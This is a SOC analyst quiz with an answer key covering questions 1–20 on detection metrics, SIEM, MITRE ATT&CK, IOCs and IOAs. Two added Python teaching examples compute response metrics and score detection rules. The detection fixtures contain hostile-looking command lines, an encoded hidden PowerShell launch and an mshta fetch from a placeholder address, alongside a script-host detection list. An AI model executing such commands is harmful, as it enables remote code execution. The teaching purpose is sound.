Covered:
1. SOC Architecture & Strategy
2. Threat Detection & Analytics
3. Incident Response & Forensics
4. Automation & Orchestration (SOAR)
5. Threat Intelligence Integration
6. Continuous Monitoring & Metrics
7. Cloud & Hybrid SOC
8. Legal, Compliance & Reporting
Questions 1–100
1. What is the primary purpose of a SOC?
ANSWER ✓ To continuously monitor, detect, analyze, and respond to cybersecurity incidents.
2. Name three core functions of a SOC.
ANSWER ✓ Monitor, detect, and respond.
3. Which framework is most commonly used to map SOC processes?
ANSWER ✓ NIST Cybersecurity Framework (CSF) for the SOC's functions and processes; MITRE ATT&CK for mapping detections to adversary tactics and techniques.
4. What is the difference between a Tier 1 and Tier 2 SOC analyst?
ANSWER ✓ Tier 1 triages alerts; Tier 2 investigates and deep-dives.
5. Define “alert fatigue” in SOC.
ANSWER ✓ Desensitization due to excessive false positives, leading to missed real threats.
6. What is MTTD?
ANSWER ✓ Mean Time to Detect.
7. What is MTTR in SOC context?
ANSWER ✓ Mean Time to Respond/Recover.
8. Which SOC metric measures efficiency of handling incidents?
ANSWER ✓ Mean Time to Contain (MTTC): the time from detection to stopping the incident from spreading further.
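As an added worked example (not part of the original question set), the Python below computes MTTD, MTTC and MTTR from a handful of constructed incident records. The incident IDs, timestamps and phase names are made up for illustration; MTTR is taken here as detection-to-recovery, since the page allows either reading.

```python
from datetime import datetime
from statistics import mean

# Constructed incident records for illustration only (not from a real SOC).
# Each ISO-8601 timestamp marks a phase boundary established during the
# investigation: when malicious activity began, when the SOC first alerted,
# when the affected asset was isolated, and when service was fully restored.
INCIDENTS = [
    {"id": "INC-1", "started": "2024-03-01T02:00", "detected": "2024-03-01T02:45",
     "contained": "2024-03-01T03:15", "recovered": "2024-03-01T06:00"},
    {"id": "INC-2", "started": "2024-03-04T22:10", "detected": "2024-03-05T01:10",
     "contained": "2024-03-05T01:40", "recovered": "2024-03-05T09:10"},
    {"id": "INC-3", "started": "2024-03-09T14:00", "detected": "2024-03-09T14:15",
     "contained": "2024-03-09T15:15", "recovered": "2024-03-09T16:15"},
]

PHASES = ("started", "detected", "contained", "recovered")


def _minutes(start_iso, end_iso):
    """Elapsed minutes between two ISO-8601 timestamps."""
    delta = datetime.fromisoformat(end_iso) - datetime.fromisoformat(start_iso)
    return delta.total_seconds() / 60


def validate(incident):
    """Reject records whose phases run backwards: one bad timestamp silently
    skews every mean, so fail loudly instead of averaging garbage."""
    times = [datetime.fromisoformat(incident[p]) for p in PHASES]
    if times != sorted(times):
        raise ValueError(f"{incident['id']}: phases out of order")
    return incident


def soc_metrics(incidents):
    """Mean Time to Detect, Contain and Recover, in minutes.

    MTTD: started -> detected   (attacker dwell time before the SOC noticed)
    MTTC: detected -> contained (how quickly the blast radius was capped)
    MTTR: detected -> recovered (time from alert to full restoration)
    """
    recs = [validate(i) for i in incidents]
    return {
        "mttd_minutes": mean(_minutes(i["started"], i["detected"]) for i in recs),
        "mttc_minutes": mean(_minutes(i["detected"], i["contained"]) for i in recs),
        "mttr_minutes": mean(_minutes(i["detected"], i["recovered"]) for i in recs),
    }


def sla_breaches(incidents, mttd_sla_minutes):
    """Incidents whose individual detection time exceeded the SLA; the mean
    alone hides the outliers a SOC manager actually needs to see."""
    return [i["id"] for i in incidents
            if _minutes(i["started"], i["detected"]) > mttd_sla_minutes]


if __name__ == "__main__":
    print(soc_metrics(INCIDENTS))
    print("MTTD SLA (60 min) breached by:", sla_breaches(INCIDENTS, 60))
```

The means for the three constructed incidents come out to 80, 40 and 265 minutes; the per-incident SLA check is the part worth keeping, because an MTTD of 80 minutes looks acceptable while INC-2 sat undetected for three hours.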
9. Name a SIEM tool commonly used in SOCs.
ANSWER ✓ Splunk, Microsoft Sentinel, or QRadar.
10. What is a playbook in SOAR?
ANSWER ✓ Predefined automated response workflow for specific incidents.
11. Which MITRE ATT&CK tactic is the first step for most attackers?
ANSWER ✓ Reconnaissance (TA0043), the first tactic in the Enterprise matrix. It mostly happens outside the victim's network, so Initial Access is usually the first tactic a SOC can actually observe.
12. What is a false positive?
ANSWER ✓ An alert triggered by benign activity but flagged as malicious.
13. What is a true negative?
ANSWER ✓ No threat detected and no alert triggered — expected state.
14. Define “threat hunting.”
ANSWER ✓ Proactive search for hidden threats not detected by automated tools.
15. What is a hypothesis-driven hunt?
ANSWER ✓ Hunting based on a specific threat scenario or TTP.
16. Which model describes attacker lifecycle?
ANSWER ✓ Cyber Kill Chain (Lockheed Martin); MITRE ATT&CK is the other widely used model of attacker behavior across the lifecycle.
17. What is the difference between IDS and IPS?
ANSWER ✓ An IDS monitors traffic out of band and alerts; an IPS sits inline and can also block or drop the traffic.
18. What does EDR stand for?
ANSWER ✓ Endpoint Detection and Response.
19. What is an IOC?
ANSWER ✓ Indicator of Compromise — a forensic artifact (file hash, IP address, domain, registry key) showing that a breach has already occurred.
20. What is an IOA?
ANSWER ✓ Indicator of Attack — a behavioral pattern (e.g., an Office application spawning PowerShell) that signals an attack in progress, independent of any specific hash or address.
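The following added example (mine, not part of the original question set) ties together questions 12–13 and 19–20: it runs an IOC rule and an IOA rule over constructed process-creation events and scores each with a confusion matrix, so the false-positive and true-negative definitions above become concrete numbers. The events, hashes and the TEST-NET address are invented; the rules are illustrative and not taken from any vendor's ruleset.

```python
# Constructed process-creation events for illustration only (not real telemetry).
# The "malicious" field is the analyst's ground truth, used only to score the
# rules; a live detection pipeline would not have it.
EVENTS = [
    {"id": 1, "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell -nop -w hidden -enc JABzAD0A", "sha256": "aaa111", "malicious": True},
    {"id": 2, "parent": "WINWORD.EXE", "image": "pwsh.exe",          # same TTP, recompiled payload
     "cmdline": "pwsh -EncodedCommand JABzAD0A", "sha256": "bbb222", "malicious": True},
    {"id": 3, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1", "sha256": "ccc333", "malicious": False},
    {"id": 4, "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "sha256": "ddd444", "malicious": False},
    {"id": 5, "parent": "EXCEL.EXE", "image": "cmd.exe",              # finance macro, benign
     "cmdline": "cmd /c copy report.csv \\\\fileshare\\q1", "sha256": "eee555", "malicious": False},
    {"id": 6, "parent": "OUTLOOK.EXE", "image": "mshta.exe",
     "cmdline": "mshta http://203.0.113.5/x.hta", "sha256": "fff666", "malicious": True},
]

# IOC rule: exact match on known-bad artifacts. Placeholder hashes and a
# TEST-NET address stand in for threat-intel feed entries.
BAD_HASHES = {"aaa111"}
BAD_IPS = {"203.0.113.5"}


def ioc_rule(ev):
    return ev["sha256"] in BAD_HASHES or any(ip in ev["cmdline"] for ip in BAD_IPS)


# IOA rule: an Office application spawning a script host or LOLBin. This
# matches the behaviour (phishing document -> execution) rather than any one
# sample, so it still fires when the attacker rebuilds the payload.
OFFICE_APPS = {"WINWORD.EXE", "EXCEL.EXE", "OUTLOOK.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def ioa_rule(ev):
    return ev["parent"].upper() in OFFICE_APPS and ev["image"].lower() in SCRIPT_HOSTS


def confusion_matrix(rule, events):
    """Count TP/FP/FN/TN: a false positive is a benign event the rule flagged,
    a true negative is a benign event it correctly ignored."""
    cm = {"tp": 0, "fp": 0, "fn": 0, "tn": 0}
    for ev in events:
        fired, bad = rule(ev), ev["malicious"]
        key = ("tp" if bad else "fp") if fired else ("fn" if bad else "tn")
        cm[key] += 1
    return cm


def rates(cm):
    """Precision (analyst time wasted), recall (attacks missed) and
    false-positive rate (the alert-fatigue driver)."""
    p = cm["tp"] / (cm["tp"] + cm["fp"]) if cm["tp"] + cm["fp"] else 0.0
    r = cm["tp"] / (cm["tp"] + cm["fn"]) if cm["tp"] + cm["fn"] else 0.0
    fpr = cm["fp"] / (cm["fp"] + cm["tn"]) if cm["fp"] + cm["tn"] else 0.0
    return {"precision": p, "recall": r, "fpr": fpr}


def fired_ids(rule, events):
    return [ev["id"] for ev in events if rule(ev)]


if __name__ == "__main__":
    for name, rule in (("IOC", ioc_rule), ("IOA", ioa_rule)):
        cm = confusion_matrix(rule, EVENTS)
        print(name, cm, rates(cm), "fired on", fired_ids(rule, EVENTS))
```

On this data the IOC rule has no false positives but misses event 2, where the attacker rotated the hash; the IOA rule catches all three malicious events but flags the benign Excel macro (event 5), which is the precision-versus-recall trade-off behind alert fatigue. The usual tuning response is to allow-list that specific parent/script path, not to switch the behavioral rule off.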